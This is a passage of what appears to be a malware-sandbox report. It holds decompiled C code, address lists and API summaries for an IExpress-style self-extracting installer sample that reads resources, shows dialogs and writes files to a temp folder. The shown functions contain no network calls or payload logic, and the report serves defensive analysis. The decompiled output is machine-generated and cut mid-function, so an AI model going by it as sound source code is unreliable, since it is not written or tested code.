                                                                                                                                                                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                          										L15:
                                                                                                                                                                                                          										GlobalUnlock(_t103);
                                                                                                                                                                                                          										_t99 = _v16;
                                                                                                                                                                                                          										L18:
                                                                                                                                                                                                          										_t87 = _t87 + 1;
                                                                                                                                                                                                          										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                          										_v20 = _t87;
                                                                                                                                                                                                          										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L19;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t79 = _v44;
                                                                                                                                                                                                          										_t88 = _t106;
                                                                                                                                                                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                          										_t101 = _v28;
                                                                                                                                                                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                          										_t97 = _v48;
                                                                                                                                                                                                          										_v36 = _t83;
                                                                                                                                                                                                          										_t109 = _t83;
                                                                                                                                                                                                          										do {
                                                                                                                                                                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00862A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00862A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                          											_t109 = _t109 + 0x18;
                                                                                                                                                                                                          											_t88 = _t88 + 4;
                                                                                                                                                                                                          										} while (_t88 < 8);
                                                                                                                                                                                                          										_t87 = _v20;
                                                                                                                                                                                                          										_t106 = 0;
                                                                                                                                                                                                          										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                          												GlobalUnlock(_t103);
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L15;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L15;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L20:
                                                                                                                                                                                                          				 *_a8 = _t87;
                                                                                                                                                                                                          				if(_t103 != 0) {
                                                                                                                                                                                                          					GlobalFree(_t103);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t106;
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x008628f1
                                                                                                                                                                                                          0x008628f4
                                                                                                                                                                                                          0x008628f7
                                                                                                                                                                                                          0x008628f9
                                                                                                                                                                                                          0x008628fc
                                                                                                                                                                                                          0x008628ff
                                                                                                                                                                                                          0x00862901
                                                                                                                                                                                                          0x00862907
                                                                                                                                                                                                          0x00862a62
                                                                                                                                                                                                          0x00862a64
                                                                                                                                                                                                          0x0086290d
                                                                                                                                                                                                          0x0086290d
                                                                                                                                                                                                          0x0086290f
                                                                                                                                                                                                          0x00862912
                                                                                                                                                                                                          0x00862920
                                                                                                                                                                                                          0x00862937
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862944
                                                                                                                                                                                                          0x0086294a
                                                                                                                                                                                                          0x0086294f
                                                                                                                                                                                                          0x00862a2f
                                                                                                                                                                                                          0x00862a32
                                                                                                                                                                                                          0x00862a34
                                                                                                                                                                                                          0x00862a37
                                                                                                                                                                                                          0x00862a41
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862955
                                                                                                                                                                                                          0x0086295e
                                                                                                                                                                                                          0x00862962
                                                                                                                                                                                                          0x00862969
                                                                                                                                                                                                          0x0086296f
                                                                                                                                                                                                          0x00862974
                                                                                                                                                                                                          0x0086298c
                                                                                                                                                                                                          0x00862a20
                                                                                                                                                                                                          0x00862a21
                                                                                                                                                                                                          0x00862a27
                                                                                                                                                                                                          0x00862a4c
                                                                                                                                                                                                          0x00862a4f
                                                                                                                                                                                                          0x00862a50
                                                                                                                                                                                                          0x00862a53
                                                                                                                                                                                                          0x00862a56
                                                                                                                                                                                                          0x00862a5c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008629b2
                                                                                                                                                                                                          0x008629b2
                                                                                                                                                                                                          0x008629b5
                                                                                                                                                                                                          0x008629bd
                                                                                                                                                                                                          0x008629c3
                                                                                                                                                                                                          0x008629cc
                                                                                                                                                                                                          0x008629d5
                                                                                                                                                                                                          0x008629d7
                                                                                                                                                                                                          0x008629da
                                                                                                                                                                                                          0x008629dd
                                                                                                                                                                                                          0x008629df
                                                                                                                                                                                                          0x008629ec
                                                                                                                                                                                                          0x008629f8
                                                                                                                                                                                                          0x008629fc
                                                                                                                                                                                                          0x008629ff
                                                                                                                                                                                                          0x00862a02
                                                                                                                                                                                                          0x00862a07
                                                                                                                                                                                                          0x00862a0a
                                                                                                                                                                                                          0x00862a0f
                                                                                                                                                                                                          0x00862a19
                                                                                                                                                                                                          0x00862a81
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862a0f
                                                                                                                                                                                                          0x0086298c
                                                                                                                                                                                                          0x00862974
                                                                                                                                                                                                          0x00862962
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086294f
                                                                                                                                                                                                          0x00862912
                                                                                                                                                                                                          0x00862a65
                                                                                                                                                                                                          0x00862a68
                                                                                                                                                                                                          0x00862a6c
                                                                                                                                                                                                          0x00862a6f
                                                                                                                                                                                                          0x00862a6f
                                                                                                                                                                                                          0x00862a7d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00862A6F
                                                                                                                                                                                                            • Part of subcall function 00862773: CharUpperA.USER32(B82E2007,00000000,00000000,00000000), ref: 008627A8
                                                                                                                                                                                                            • Part of subcall function 00862773: CharNextA.USER32(0000054D), ref: 008627B5
                                                                                                                                                                                                            • Part of subcall function 00862773: CharNextA.USER32(00000000), ref: 008627BC
                                                                                                                                                                                                            • Part of subcall function 00862773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862829
                                                                                                                                                                                                            • Part of subcall function 00862773: RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862852
                                                                                                                                                                                                            • Part of subcall function 00862773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862870
                                                                                                                                                                                                            • Part of subcall function 00862773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008628A0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00863938,?,?,?,?,-00000005), ref: 00862958
                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 00862969
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00863938,?,?,?,?,-00000005,?), ref: 00862A21
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00862A81
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3949799724-0
                                                                                                                                                                                                          • Opcode ID: d4b6a75adb4ff191e84bcfeb7ca4ce8e2ef37bccff4566c9ca16ba3d2a4e0393
                                                                                                                                                                                                          • Instruction ID: 561e4a5f360b91df48620189850bf76ec6de468768ba776a989ff01979625f9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b6a75adb4ff191e84bcfeb7ca4ce8e2ef37bccff4566c9ca16ba3d2a4e0393
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80514831A00629DBCB25CF98D885AAEBBB5FF48701F1640AAE911E3211DB719941CF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 32%
                                                                                                                                                                                                          			E00864169(void* __eflags) {
                                                                                                                                                                                                          				int _t18;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t20 = E0086468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                          					if(E0086468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							return LocalFree(_t21);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(0x40);
                                                                                                                                                                                                          						_push(0);
                                                                                                                                                                                                          						_push(_t21);
                                                                                                                                                                                                          						_t18 = 0x3e9;
                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                          						E008644B9(0, _t18);
                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0x10);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_t18 = 0x4b1;
                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          0x0086417d
                                                                                                                                                                                                          0x0086418f
                                                                                                                                                                                                          0x00864193
                                                                                                                                                                                                          0x008641b7
                                                                                                                                                                                                          0x008641d3
                                                                                                                                                                                                          0x008641e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008641e7
                                                                                                                                                                                                          0x008641d5
                                                                                                                                                                                                          0x008641d6
                                                                                                                                                                                                          0x008641d8
                                                                                                                                                                                                          0x008641d9
                                                                                                                                                                                                          0x008641da
                                                                                                                                                                                                          0x008641df
                                                                                                                                                                                                          0x008641e1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008641e1
                                                                                                                                                                                                          0x008641b9
                                                                                                                                                                                                          0x008641ba
                                                                                                                                                                                                          0x008641bc
                                                                                                                                                                                                          0x008641bd
                                                                                                                                                                                                          0x008641be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008641be
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008630B4), ref: 00864189
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008630B4), ref: 008641E7
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                          • String ID: <None>$FINISHMSG
                                                                                                                                                                                                          • API String ID: 3507850446-3091758298
                                                                                                                                                                                                          • Opcode ID: 74386932c16db0b2944518b01452ac506d8846258c8b8520890f5cc48585003c
                                                                                                                                                                                                          • Instruction ID: 5135d83d2930338b5213aa48064d0e188287699a6fc22f6da0d922c6b395393d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74386932c16db0b2944518b01452ac506d8846258c8b8520890f5cc48585003c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1401D6B13002147FF72416695C86F7F218EFBD6795F075025B706E12819DA9CC01417A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E008619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v520;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t11;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				struct HWND__* _t34;
                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __edi;
                                                                                                                                                                                                          				_t27 = __ebx;
                                                                                                                                                                                                          				_t11 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                          				_t34 = _a4;
                                                                                                                                                                                                          				_t14 = _a8 - 0x110;
                                                                                                                                                                                                          				if(_t14 == 0) {
                                                                                                                                                                                                          					_t32 = GetDesktopWindow();
                                                                                                                                                                                                          					E008643D0(_t34, _t15);
                                                                                                                                                                                                          					_v520 = 0;
                                                                                                                                                                                                          					LoadStringA( *0x869a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                          					MessageBeep(0xffffffff);
                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if(_t14 != 1) {
                                                                                                                                                                                                          						L4:
                                                                                                                                                                                                          						_t23 = 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t32 = _a12;
                                                                                                                                                                                                          						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							EndDialog(_t34, _t32);
                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                          							_t23 = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                          			}













                                                                                                                                                                                                          0x008619e0
                                                                                                                                                                                                          0x008619e0
                                                                                                                                                                                                          0x008619eb
                                                                                                                                                                                                          0x008619f2
                                                                                                                                                                                                          0x008619f9
                                                                                                                                                                                                          0x008619fc
                                                                                                                                                                                                          0x00861a01
                                                                                                                                                                                                          0x00861a2a
                                                                                                                                                                                                          0x00861a2e
                                                                                                                                                                                                          0x00861a3e
                                                                                                                                                                                                          0x00861a4f
                                                                                                                                                                                                          0x00861a62
                                                                                                                                                                                                          0x00861a6a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861a03
                                                                                                                                                                                                          0x00861a06
                                                                                                                                                                                                          0x00861a20
                                                                                                                                                                                                          0x00861a20
                                                                                                                                                                                                          0x00861a08
                                                                                                                                                                                                          0x00861a08
                                                                                                                                                                                                          0x00861a14
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00861a16
                                                                                                                                                                                                          0x00861a18
                                                                                                                                                                                                          0x00861a70
                                                                                                                                                                                                          0x00861a72
                                                                                                                                                                                                          0x00861a72
                                                                                                                                                                                                          0x00861a14
                                                                                                                                                                                                          0x00861a06
                                                                                                                                                                                                          0x00861a81

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00861A18
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00861A24
                                                                                                                                                                                                          • LoadStringA.USER32(?,?,00000200), ref: 00861A4F
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00861A62
                                                                                                                                                                                                          • MessageBeep.USER32(000000FF), ref: 00861A6A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1273765764-0
                                                                                                                                                                                                          • Opcode ID: 408b713907885a9c79332d3ab5b27c46d981cedbd7859f336313169061eab56a
                                                                                                                                                                                                          • Instruction ID: f0fe2da67756379c4bb3f0d46d6590b516ce832b916433cd10f083959a4ac334
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 408b713907885a9c79332d3ab5b27c46d981cedbd7859f336313169061eab56a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1711E531500119AFCB14EFA8ED0DAAE77B8FF0A301F064151F516E2191DE709E00CB96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                          			E008663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				long _v272;
                                                                                                                                                                                                          				void* _v276;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                          				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                          				signed int _t40;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t15 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                          				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_v276 = _a16;
                                                                                                                                                                                                          				_t37 = 1;
                                                                                                                                                                                                          				E00861781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          				E0086658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                          				_t28 = 0;
                                                                                                                                                                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                          				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                          					_t28 = _a4;
                                                                                                                                                                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                          						 *0x869124 = 0x80070052;
                                                                                                                                                                                                          						_t37 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					CloseHandle(_t39);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					 *0x869124 = 0x80070052;
                                                                                                                                                                                                          					_t37 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          0x008663cb
                                                                                                                                                                                                          0x008663d2
                                                                                                                                                                                                          0x008663d8
                                                                                                                                                                                                          0x008663ea
                                                                                                                                                                                                          0x008663f3
                                                                                                                                                                                                          0x00866401
                                                                                                                                                                                                          0x00866402
                                                                                                                                                                                                          0x00866410
                                                                                                                                                                                                          0x00866415
                                                                                                                                                                                                          0x00866433
                                                                                                                                                                                                          0x00866438
                                                                                                                                                                                                          0x00866449
                                                                                                                                                                                                          0x00866463
                                                                                                                                                                                                          0x0086646d
                                                                                                                                                                                                          0x00866477
                                                                                                                                                                                                          0x00866477
                                                                                                                                                                                                          0x0086647a
                                                                                                                                                                                                          0x0086643a
                                                                                                                                                                                                          0x0086643a
                                                                                                                                                                                                          0x00866444
                                                                                                                                                                                                          0x00866444
                                                                                                                                                                                                          0x00866492

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086642D
                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086645B
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086647A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008663EB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 1065093856-2312194364
                                                                                                                                                                                                          • Opcode ID: 1df1a1633109aaf3e003cbf63befec9d1f9087811d32b24860984dbf4f0b3319
                                                                                                                                                                                                          • Instruction ID: f6a3ede38963d9db8c8ab4c8e10f520942a5c5e9cae9f04c1be529b3d1a1c511
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df1a1633109aaf3e003cbf63befec9d1f9087811d32b24860984dbf4f0b3319
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A21F071A00218ABCB20DF29DC85FEA73ACFB45314F1101A9E595E7280EAB46D948FA5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008647E0(intOrPtr* __ecx) {
                                                                                                                                                                                                          				intOrPtr _t6;
                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                          				intOrPtr* _t22;
                                                                                                                                                                                                          				void _t24;
                                                                                                                                                                                                          				struct HWND__* _t25;
                                                                                                                                                                                                          				struct HWND__* _t26;
                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __ecx;
                                                                                                                                                                                                          				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                          				if(_t34 != 0) {
                                                                                                                                                                                                          					_t22 = _t33;
                                                                                                                                                                                                          					_t27 = _t22 + 1;
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						_t6 =  *_t22;
                                                                                                                                                                                                          						_t22 = _t22 + 1;
                                                                                                                                                                                                          					} while (_t6 != 0);
                                                                                                                                                                                                          					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                          					 *_t34 = _t24;
                                                                                                                                                                                                          					if(_t24 != 0) {
                                                                                                                                                                                                          						_t28 = _t33;
                                                                                                                                                                                                          						_t19 = _t28 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t9 =  *_t28;
                                                                                                                                                                                                          							_t28 = _t28 + 1;
                                                                                                                                                                                                          						} while (_t9 != 0);
                                                                                                                                                                                                          						E00861680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                          						_t11 =  *0x8691e0; // 0x2df8360
                                                                                                                                                                                                          						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                          						 *0x8691e0 = _t34;
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t25 =  *0x868584; // 0x0
                                                                                                                                                                                                          					E008644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                          					LocalFree(_t34);
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t26 =  *0x868584; // 0x0
                                                                                                                                                                                                          				E008644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                                          			}















                                                                                                                                                                                                          0x008647e8
                                                                                                                                                                                                          0x008647f0
                                                                                                                                                                                                          0x008647f4
                                                                                                                                                                                                          0x0086480f
                                                                                                                                                                                                          0x00864811
                                                                                                                                                                                                          0x00864814
                                                                                                                                                                                                          0x00864814
                                                                                                                                                                                                          0x00864816
                                                                                                                                                                                                          0x00864817
                                                                                                                                                                                                          0x00864829
                                                                                                                                                                                                          0x0086482b
                                                                                                                                                                                                          0x0086482f
                                                                                                                                                                                                          0x0086484f
                                                                                                                                                                                                          0x00864852
